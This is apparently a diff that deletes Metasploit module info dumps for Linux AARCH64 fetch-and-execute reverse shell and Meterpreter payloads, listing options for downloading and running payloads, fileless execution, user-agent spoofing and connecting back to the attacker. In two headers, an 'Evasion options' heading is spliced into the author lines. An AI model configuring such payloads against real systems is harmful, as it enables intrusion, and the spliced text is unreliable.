EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,104 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_http
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 111
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
B
|
|
||||||
Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_http:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8080 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME QJpbzCbQetk no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,106 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_https
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 105
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Br
|
|
||||||
Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_https:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
apid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8443 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME htteRZaNp no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,97 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 114
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
Adam Cammack <adam_cammack@rapid7.com>
|
|
||||||
Brent Cook <brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME IHvjSdBvJzEf no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,93 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager
|
|
||||||
Module: payload/cmd/linux/http/aarch64/shell/reverse_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 114
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
SHELL /bin/sh yes The shell to execute.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME CbrLJLwKRPdb no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
|
||||||
dup2 socket in x12, then execve.
|
|
||||||
|
|
||||||
Connect back to the attacker
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,81 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
|
|
||||||
Module: payload/cmd/linux/http/aarch64/shell_reverse_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 105
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
SHELL /bin/sh yes The shell to execute.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
